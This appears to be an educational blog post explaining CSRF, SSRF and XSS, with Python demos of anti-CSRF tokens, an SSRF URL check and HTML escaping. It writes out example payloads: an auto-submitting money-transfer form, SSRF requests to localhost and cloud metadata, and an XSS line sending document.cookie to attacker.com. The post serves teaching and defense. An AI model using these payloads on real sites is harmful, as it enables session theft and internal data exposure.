What are CSRF, XSS and SSRF?

CSRF, XSS and SSRF are common ways in which attackers steal information from, or act on behalf of, unsuspecting victims. Attackers use a wide range of techniques when going after a target. Here I will be explaining three of the main types, which commonly get mixed up because their names are so similar. These are:

  • Cross Site Request Forgery (CSRF)
  • Server Side Request Forgery (SSRF)
  • Cross Site Scripting (XSS)
    • This is further broken down into reflected XSS and stored (persistent) XSS

CSRF, XSS and SSRF are all web security vulnerabilities, but they differ in how they work and in the type of attacks they enable. I will explain how to mitigate each of them at the end.

Cross Site Request Forgery

CSRF tricks a user's browser into performing an unwanted action on a website where the user is already authenticated (e.g., while logged into their account). It exploits the trust that a website places in the user's browser, and it is one of the more common vulnerabilities you will see.

CSRF happens in the following order:

  1. The user logs into a trusted website (e.g., their bank account).
  2. The attacker creates a malicious link or page and gets the user to open it (e.g., via email or a phishing website).
  3. The malicious page makes the user's browser send a request to the trusted site. The browser attaches the user's cookies/session to it, so the server assumes it is a legitimate action.

This could be as easy as someone sending you a link to a web page containing the following code:

<form action="https://bank.com/transfer" method="POST">
<input type="hidden" name="amount" value="1000">
<input type="hidden" name="to_account" value="attacker_account">
</form>
<script>document.forms[0].submit();</script>

The script submits the hidden form as soon as the page loads. The request goes to bank.com with your current logged-in session cookie attached, and the transfer completes, because the bank trusts any request that carries your session.

In reality it is rarely this simple, but this is the basic shape of the attack. Depending on the site, it could let an attacker send money, change an email address or password, or perform any other state-changing action the victim is allowed to perform.
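To make the fix concrete, here is a small added example (my own code, not from the original post) that models the bank's POST /transfer handler in Python, once trusting the session cookie alone and once also requiring a per-session anti-CSRF token. The session store, account balances, request dicts and user names are all constructed for the demo; the browser attaching the cookie is represented by the forged request carrying the session id but no token, because a page on attacker.com cannot read the token out of bank.com's pages.

```python
import hmac
import secrets


def new_session(sessions, user):
    """Log a user in: create a session id and a random per-session anti-CSRF token."""
    sid = "sess-" + secrets.token_hex(8)
    sessions[sid] = {"user": user, "csrf_token": secrets.token_hex(16)}
    return sid


def _move_money(accounts, src, dst, amount):
    if accounts.get(src, 0) < amount:
        raise ValueError("insufficient funds")
    accounts[src] -= amount
    accounts[dst] = accounts.get(dst, 0) + amount


def transfer_vulnerable(sessions, accounts, request):
    """POST /transfer that trusts the session cookie alone (the situation exploited above)."""
    session = sessions.get(request["cookies"].get("session", ""))
    if session is None:
        return 401
    _move_money(accounts, session["user"],
                request["form"]["to_account"], int(request["form"]["amount"]))
    return 200


def transfer_protected(sessions, accounts, request):
    """Same endpoint, but the form body must also carry the token tied to this session.
    attacker.com can make the browser send the cookie, but it cannot read the token
    out of bank.com's HTML, so a forged form cannot include a valid one."""
    session = sessions.get(request["cookies"].get("session", ""))
    if session is None:
        return 401
    submitted = request["form"].get("csrf_token", "")
    # constant-time comparison so the token cannot be guessed byte by byte via timing
    if not hmac.compare_digest(submitted, session["csrf_token"]):
        return 403
    _move_money(accounts, session["user"],
                request["form"]["to_account"], int(request["form"]["amount"]))
    return 200


def run_forged(handler):
    """Replay the auto-submitting form above: cookie attached by the browser, no token.
    Returns (HTTP status, alice's balance afterwards)."""
    sessions, accounts = {}, {"alice": 5000, "attacker_account": 0}   # constructed state
    sid = new_session(sessions, "alice")
    forged = {"cookies": {"session": sid},
              "form": {"amount": "1000", "to_account": "attacker_account"}}
    return handler(sessions, accounts, forged), accounts["alice"]


def run_legitimate(handler):
    """A transfer submitted from bank.com's own page, which embeds the token in the form."""
    sessions, accounts = {}, {"alice": 5000, "bob": 0}               # constructed state
    sid = new_session(sessions, "alice")
    legit = {"cookies": {"session": sid},
             "form": {"amount": "1000", "to_account": "bob",
                      "csrf_token": sessions[sid]["csrf_token"]}}
    return handler(sessions, accounts, legit), accounts["alice"]


if __name__ == "__main__":
    print("forged vs vulnerable handler:   ", run_forged(transfer_vulnerable))      # (200, 4000)
    print("forged vs protected handler:    ", run_forged(transfer_protected))       # (403, 5000)
    print("legitimate vs protected handler:", run_legitimate(transfer_protected))   # (200, 4000)
```

Run it and the forged request drains 1000 from alice against the vulnerable handler but is rejected with 403 by the protected one, while the legitimate request from bank.com's own page still succeeds. Setting the session cookie with SameSite=Lax or Strict is a complementary browser-side control: the browser then does not attach the cookie to a cross-site POST in the first place.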

Server Side Request Forgery

SSRF lets an attacker trick a server into making requests to unintended destinations, including internal systems or sensitive endpoints that the attacker cannot reach directly from the outside. It differs from CSRF in that the server, not the user's browser, is the one tricked into making the request.

  1. A web application accepts user input (e.g., a URL to fetch data or images).
  2. The attacker provides a malicious URL (e.g., http://localhost/admin).
  3. The server makes the request to the provided URL, potentially exposing sensitive data or interacting with internal systems.

Imagine a web application allows users to provide a URL to upload their profile picture. The application fetches the image from the provided URL and stores it on the server. The code might look like this:

import requests

def fetch_image(image_url):
    # No check on the scheme, host or port: the server fetches whatever URL it is given
    response = requests.get(image_url)  # Fetch the image from the URL
    if response.status_code == 200:
        with open('profile_picture.jpg', 'wb') as f:
            f.write(response.content)
    else:
        print("Failed to fetch the image.")

An attacker could then submit a request such as:

http://yourserver.com/fetch-title?url=http://localhost:8080/admin/passwords.txt

The server would fetch http://localhost:8080/admin/passwords.txt from its own loopback interface, which the attacker could never reach from outside, and save whatever comes back as the "profile picture", where the attacker can simply download it.

This is how SSRF exposes sensitive internal data; the same trick works against any other internal service the server can reach.
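Here is an added example (my own code, not from the original post) of the check that fetch_image() above is missing, written in Python with only the standard library. It allows http/https on the default ports only, resolves the hostname, and rejects any URL whose address is loopback, private, link-local or otherwise non-public, which is what stops the localhost request above. The FAKE_DNS table and the hostnames in it are constructed so the demo runs offline; resolve_system() is what you would pass in production.

```python
import ipaddress
import socket
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {None, 80, 443}   # None means the scheme's default port


def resolve_system(host):
    """Real DNS lookup: every address the name maps to (the demo below uses a fake instead)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_public_address(ip):
    """True only for addresses routable on the public internet."""
    addr = ipaddress.ip_address(ip)
    # ::ffff:127.0.0.1 is loopback dressed up as IPv6; judge it by its IPv4 part
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def check_fetch_url(url, resolve=resolve_system):
    """Return (allowed, reason). Call this before fetch_image() makes any request."""
    parts = urlparse(url)
    if parts.scheme not in ALLOWED_SCHEMES:          # blocks file://, gopher://, ftp:// ...
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "URL has no host"
    try:
        port = parts.port                            # raises ValueError on a malformed port
    except ValueError:
        return False, "malformed port"
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    try:
        addrs = resolve(host)
    except (OSError, ValueError):
        return False, f"could not resolve {host!r}"
    if not addrs:
        return False, f"{host!r} has no addresses"
    # every address must be public: a name with one internal A record is enough to reach inside
    for ip in addrs:
        if not is_public_address(ip):
            return False, f"{host} resolves to non-public address {ip}"
    return True, "ok"


# Constructed name -> address table standing in for DNS, so the demo runs offline.
FAKE_DNS = {
    "localhost": {"127.0.0.1"},
    "images.example.com": {"93.184.216.34"},
    "metadata.internal": {"169.254.169.254"},   # attacker-controlled name pointed inward
    "2130706433": {"127.0.0.1"},                # decimal form of 127.0.0.1, which libc resolves
}


def resolve_fake(host):
    try:
        return {str(ipaddress.ip_address(host))}  # literal IP: nothing to look up
    except ValueError:
        pass
    if host not in FAKE_DNS:
        raise OSError("name not found")
    return FAKE_DNS[host]


if __name__ == "__main__":
    for url in ("http://localhost:8080/admin/passwords.txt",
                "http://169.254.169.254/latest/meta-data/",
                "http://[::ffff:127.0.0.1]/",
                "file:///etc/passwd",
                "http://images.example.com/cat.jpg"):
        print(url, "->", check_fetch_url(url, resolve_fake))
```

The check is only half of the fix: after it passes, the fetch itself must connect to the address that was checked (not re-resolve the name, which an attacker's DNS can change between the two lookups) and must not follow redirects, because a perfectly public host can answer with a 302 to http://127.0.0.1/. Where the application only ever needs a handful of image hosts, an explicit allowlist of hostnames is simpler and stronger than this denylist of address ranges.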

Cross Site Scripting

XSS is a vulnerability where an attacker injects malicious scripts into web pages viewed by other users.

  1. The attacker injects a malicious script (e.g., JavaScript) into a vulnerable website.
  2. When other users visit the affected page, their browsers execute the attacker’s script.
  3. The script can steal cookies, hijack sessions, or even redirect users to malicious websites.

There are three types of XSS; I will cover the two main ones here (the third, DOM-based XSS, happens entirely inside the page's own JavaScript and is not covered in this post).

Stored XSS: The malicious script is saved on the server and served to every user who views the page (e.g., in a comment section or on a profile page). This could be a user adding a comment such as:

<script>document.location = 'http://attacker.com?cookie=' + document.cookie;</script>

This would then run every time any user opens the comments section, sending that user's cookie to the attacker's server at attacker.com.

Reflected XSS: The script is included in the server's response to a request (e.g., taken from a URL parameter) and executed in the victim's browser.

This happens when input is echoed back into the page without being properly sanitised or encoded. Say someone sends you an email with this link:

https://example.com/search?q=<script>alert('Hacked!')</script>

If the site writes the q parameter straight into the results page, this would give you a popup saying "Hacked!". Scary, I know. But an attacker could just as easily craft a link whose script steals your session cookie and then use it to log into your account (if the cookie is marked HttpOnly the script cannot read it, but it can still perform actions as you inside the page).
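As an added illustration (my own code, not from the original post), here is the difference between pasting user input into HTML and encoding it, using the two payloads from this post plus a constructed attribute-breakout payload that contains no <script> tag at all. The render_* functions and the executes_script() detector are simplified stand-ins for a real template and are not from any particular framework.

```python
import html

# The two payloads quoted in the post, plus a constructed third one.
STORED_PAYLOAD = "<script>document.location = 'http://attacker.com?cookie=' + document.cookie;</script>"
REFLECTED_PAYLOAD = "<script>alert('Hacked!')</script>"
# No <script> tag here: it just closes the value="..." attribute and adds an event handler,
# which is why escaping '<' and '>' alone is not enough inside attributes.
ATTRIBUTE_PAYLOAD = '" autofocus onfocus="alert(document.cookie)'


def render_comment_vulnerable(comment):
    """Comment page that pastes user text straight into the HTML (stored XSS)."""
    return '<div class="comment">' + comment + '</div>'


def render_comment_safe(comment):
    """Same page with HTML entity encoding: < > & " ' become inert text."""
    return '<div class="comment">' + html.escape(comment, quote=True) + '</div>'


def render_search_vulnerable(q):
    """Results page that echoes ?q= into an attribute and into the body (reflected XSS)."""
    return f'<input name="q" value="{q}"><p>Results for {q}</p>'


def render_search_safe(q):
    safe = html.escape(q, quote=True)   # quote=True is what keeps the attribute closed
    return f'<input name="q" value="{safe}"><p>Results for {safe}</p>'


def executes_script(markup):
    """Crude static detector for the demo: a live <script> tag, or an injected
    onfocus= event handler that is still a real attribute (not an encoded &quot;).
    It is a detector for this demo, not a sanitiser."""
    lowered = markup.lower()
    return "<script" in lowered or ' onfocus="' in lowered


if __name__ == "__main__":
    for label, vuln, safe, payload in (
        ("stored comment", render_comment_vulnerable, render_comment_safe, STORED_PAYLOAD),
        ("reflected search", render_search_vulnerable, render_search_safe, REFLECTED_PAYLOAD),
        ("attribute breakout", render_search_vulnerable, render_search_safe, ATTRIBUTE_PAYLOAD),
    ):
        print(f"{label}: vulnerable executes={executes_script(vuln(payload))}, "
              f"safe executes={executes_script(safe(payload))}")
        print("   ", safe(payload))
```

In a real application you would not build HTML by concatenation at all; a template engine with auto-escaping turned on (Jinja2's autoescape, for example) does the html.escape step for every variable. The encoding also depends on where the value lands: the rules for a JavaScript string, a URL or a CSS value differ from those for HTML text, and a value that is safe in one context is not automatically safe in another. Marking the session cookie HttpOnly and sending a Content-Security-Policy header limit the damage when an encoding slip does get through.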

How to prevent all of the above

Fixing these properly is down to the developers of the web application, and each flaw has its own control:

  • CSRF: require a secret anti-CSRF token in every state-changing form or request, and set session cookies with the SameSite attribute, so a page on another site cannot make the browser submit an authenticated request.
  • SSRF: never fetch a user-supplied URL as-is; allow only the schemes and hosts you expect, and refuse anything that resolves to loopback, private or link-local addresses.
  • XSS: encode user input for the context it is written into (HTML body, attribute, JavaScript, URL) or use a template engine with auto-escaping, and add a Content-Security-Policy and HttpOnly cookies as defence in depth.

As a user you cannot fix the site, but here are some tips to avoid falling foul of these attacks:

  1. Avoid clicking on suspicious links
  2. Hover over links to check the URL before clicking
  3. Log out of sensitive accounts when you are not using them
  4. Be wary of phishing emails
  5. Enable multi-factor authentication


See below for some further reading about the above:

https://www.cloudflare.com/en-gb/learning/security/threats/cross-site-request-forgery/
